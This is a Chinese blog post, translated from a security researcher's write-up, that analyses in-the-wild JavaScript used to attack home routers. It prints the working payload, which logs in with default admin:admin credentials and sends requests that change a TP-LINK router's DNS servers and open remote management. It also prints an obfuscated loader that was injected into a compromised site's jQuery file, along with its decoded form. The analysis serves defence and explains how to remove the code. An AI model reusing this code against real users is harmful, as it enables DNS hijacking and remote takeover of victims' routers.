通过JavaScript攻击家用路由器

最新推荐文章于 2022-12-08 18:46:16 发布
最新推荐文章于 2022-12-08 18:46:16 发布
阅读量2.5k 收藏 2
点赞数 1
分类专栏: Web前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/risingsun001/article/details/25243783
版权

我们最近注意到提交Wepawet试图访问本地IP地址。这是特别重要的,因为攻击者的目的是篡改受害者的家庭路由器的配置。

一个活生生的例子是位于http://freemdsv.com/ad.php?pid=20120811

if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) {
    document.writeln("<div style=\'display:none\'>");

    function ip1() {
        i = new Image;
        i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 οnlοad=ip1()>');

    function ip3() {
        ii = new Image;
        ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 οnlοad=ip3()>');
    document.writeln("</div>");
}
该脚本主要检查是否路由器是通过图像请求访问: 

  http://admin:admin @ 192.168.1.1/images/logo.jpg

因此,预计该路由器是留在与用户名/密码的默认配置为管理员:admin和它是从IP地址192.168.1.1访问。 IP1和IP3负责路由器与下列请求恶意重构的功能: 

http ://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced

http ://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8
文件“PPPoECfgAdvRpm.htm”似乎是的PPPoE高级设置的TP-LINK路由器 (配置链接 演示地址 )。 他们改变受害者的DNS服务器58.221.59.217和114.114.114.114这是非常有趣的,这意味着受害者是易受人在这方面的中间人攻击。

第二个请求重新配置路由器被远程访问通过它的Web界面( 链接 演示地址)。 通过这种方式,攻击者可以在远程将自己的意志改变受害者的路由器的设置。

从Wepawet执行这种攻击的一些报道在这里:

Wepawet报告 
Wepawet报告 
Wepawet报告 
Wepawet报告 
Wepawet报告 
Wepawet报告 
Wepawet报告 
Wepawet报告 
Wepawet报告 
Wepawet报告


很多站长朋友反馈,有时候会运行网站的时候会看到下面的被chrome或者firefox等拦截的提示


其实就是网站中某个JS文件被加入了JavaScript攻击家用路由器的代码。也就是说网站被挂马了。

如果你的网站出现这样的情况,不要着急,http://zhanzhang.anquan.org/topic/dns_hijacking/ 通过这个网址来检查你的网站。

如果被挂马的话,会出现如下面图片所示(下面的图片来自网络):


可以看出网站http://www.txxxxy.org 的检测报告里 报告了2个文件和相关恶意代码:

http://www.txxxxy.org/statics/js/jquery.sgallery.js 
http://freemdsv.com/ad.php?pid=20120811
恶意链接:
http://admin:admin@192.168.1.1/images/logo.jpg

其中 http://www.txxxxy.org/statics/js/jquery.sgallery.js  这个文件是网站http://www.txxxxy.org 上的文件,而http://freemdsv.com/ad.php?pid=20120811这个文件是别人网站上的文件。 我们分析下具体是啥。

浏览器访问http://www.txxxxy.org/statics/js/jquery.sgallery.js 得到这个js的代码,拖到文件最末看到有段代码,如下图:


代码如下:

if(document.cookie.indexOf('20120811')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='20120811=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%72%65%65%6D%64%73%76%2E%63%6F%6D%2F%61%64%2E%70%68%70%3F%70%69%64%3D%32%30%31%32%30%38%31%31%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%3C%2F%73%63%72%69%70%74%3E'));}
这段代码里有部分加密的,我们解密一下:如下图



得到代码:

<script src="http://freemdsv.com/ad.php?pid=20120811" type="text/javascript"></script>
是不是调用了我们上面说到的这个文件呢。

解决也很简单,删掉这段代码就OK了。

翻译自:http://blog.kapravelos.com/post/68334450790/attacking-home-routers-via-javascript



risingsun001
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
干货,使用java代码教你如何局域网内ARP攻击
WiteWater的博客
12-13 1434
最近在研读《深入理解计算机网络》,发现好多关于网络知识好匮乏。在看到ARP协议时,就在想java不是有接口可以获取计算机mac地址、ip、网卡等信息,是不是也可以伪造被攻击主机的mac地址进行攻击,使其不能上网。 首先,先熟悉一下ARP协议: 地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进...
JAVA 实现 TP-LINK路由器拨号
一起学JAVA
06-06 2117
public static void main(String[] args) { CloseableHttpClient httpclient = HttpClientBuilder.create().build(); HttpPost hp = new HttpPost("http://192.168.1.1"); StringEntity entity2; try { e
原生 js 实现一个前端路由 router
weixin_33768481的博客
01-29 975
效果图: 项目地址:https://github.com/biaochenxuying/route 效果体验地址: 1. 滑动效果: https://biaochenxuying.github.io/route/index.html 2. 淡入淡出效果: https://biaochenxuying.github.io/route/in...
无线路由攻击和WiFi密码破解实战[渗透技术]
一个热爱技术的程序猿
08-18 6722
文章目录一、准备阶段二、攻击阶段1.停止????网络管理员和杀死进程2.开启网卡监听模式3. 捕获数据包4.获取数据包5.注入数据包5.WiFi密码破解 一、准备阶段 攻击主机:kali Linux 攻击工具:aircrack-ng 网卡一枚 可以通过命令: sudo iwconfig 查看网卡是否已经就绪。 我的网卡名为:wlan0 root@kali:~# iwconfig lo no wireless extensions. eth0 no wireless ex
kali 简单版攻击WiFi(附详细教程)
Alphamilk的博客
12-08 1万+
由于有关这方面内容的详细介绍实在不少,但是复习起来也比较麻烦,重点和次重点之间可能会混淆,所以写一篇复习起来比较方便的一篇水文>_
路由器漏洞挖掘使用的脚本
dnqykgfmq169340687的博客
06-28 336
计算偏移多少的python脚本: # a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' # B = 'abcdefghijklmnopqrstuvwxyz' # c = '0123456789' from string import ascii_lowercase as ls from string import ascii_uppercase as U...
router:简单JavaScript路由器
05-26
简单JavaScript路由器 这是用于javascript SPA的简单路由器。 它与哈希一起使用并使用浏览器历史记录API,并且使用起来非常简单。 使用和许可 该库是一个AMD模块,需要一个AMD加载程序才能运行(例如 )。 它是根据...
lightrouter:超轻量级JavaScript路由器
05-25
超轻量级javascript路由器,适合那些需要最基本的简单javascript路由的用户。 // Initialise the router var router = new LightRouter ( { type : 'path' , // Default routing type handler : handler , // ...
ryter:小型JavaScript路由器
04-29
雷特 小型JavaScript路由器
rutter:JavaScript的通用网址路由器
05-13
烂摊子JavaScript的通用网址路由器船员手册是水手写的航行指南手册。 在航海图出现之前,车辙是用于海上航行的地理信息的主要存储。 使用 。支持Chrome合金火狐浏览器IE浏览器歌剧苹果浏览器18岁4.0 10 11.50 6.0
gibon函数式客户端JavaScript路由器
08-10
gibon:函数式客户端JavaScript路由器,约~600 bytes,构建在HTML5 History API之上。
“万能密码”攻击路由器.
12-21
“万能密码”攻击路由器 掌握改技巧能破解任何品牌路由器 且连接上网管理
家用路由器攻击
笨狐狸
10-11 1785
最近老是电脑老是中毒,有时开机浏览器不间断弹出n个广告窗口,让人抓狂,有时点击某些页面会弹出广告窗口。   杀了一段时间毒,发现后者没有太大改善。但是同时发现,整个房间里的其他设备都会出现同样的问题,让人莫名其妙。网上有人说是运营商DNS被劫持了,难道让我去投诉运营商。   将电脑放到公司,没再出现同样的问题,看来的确是家里那边的问题。那么,会不会是路由器问题呢。   我有两个路由器,一个有
什么是前端(js)路由器
何平的博客
10-29 4464
什么是JS路由器 概述 路由器是WebApp应用程序切换页面的枢纽。早起由于浏览器处理JS脚本的能力较弱,大部分逻辑和交互都在服务端完成;因此路由器这个词最早出现服务端;服务端通过客户端请求的URL解析出需要返回给客户端的HTML文档的路径,最终返回相对应HTML文档。 现在由于浏览器处理JS脚本的能力越来越强大和开发者们对客户端的性能优化以高要求及提升用户体验的实质性需求。在前端开发中,出现了路...
DNS劫持原理与操作
热门推荐
点点的博客
08-24 6万+
DNS(域名系统)的作用是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS的IP。
用JAVA代码实现ARP攻击
交换一个思想,能得到俩思想
07-05 1万+
ARP攻击原理 一台电脑通过网络访问另一台电脑的时候,在数据链路层需要知道对方的MAC地址进行真正的物理通信. 而电脑上的应用程序通常都是根据另一台电脑的IP地址来和对方建立通信,这时候就需要有一个协议将 IP地址解析到MAC地址,这就是ARP协议. 而ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP表中 是否存在对应的IP地址,如果没有,则发送一个
CentOS SYN Flood攻击原理Linux下设置
痴迷无限好
11-14 672
一:什么是CentOS SYN Flood攻击 CentOS SYN Flood攻击利用的是IPv4中TCP协议的三次握手(Three-Way Handshake)过程进行的攻击。这个协议规定,如果一端想向另一端发起TCP连接,它需要首先发送TCP SYN (synchronize)包到对方。 对方收到后发送一个TCP SYN+ACK包回来,发起方再发送TCP ACK (ACKno...
原生JS实现一个简单的前端路由(路由实现的原理)
笋芯
09-19 3万+
一个极简前端路由实现 说一下前端路由实现的简要原理,以 hash 形式(也可以使用 History API 来处理)为例,当 url 的 hash 发生变化时,触发 hashchange 注册的回调,回调中去进行不同的操作,进行不同的内容的展示。直接看代码或许更直观。 function Router() { this.routes = {}; this.curr
路由器运行python脚本_路由器漏洞挖掘使用的脚本
weixin_39671405的博客
12-04 348
计算偏移多少的python脚本:#a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'#B = 'abcdefghijklmnopqrstuvwxyz'#c = '0123456789'from string importascii_lowercase as lsfrom string importascii_uppercase as UPimporttimeimportsysimpo...
通过 JavaScript 点击元素
最新发布
06-07
这可以通过执行 JavaScript 代码来实现,如下所示: ```python from selenium import webdriver driver = webdriver.Chrome() # 使用 JavaScript 点击元素 element = driver.find_element_by_id("element_id") ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值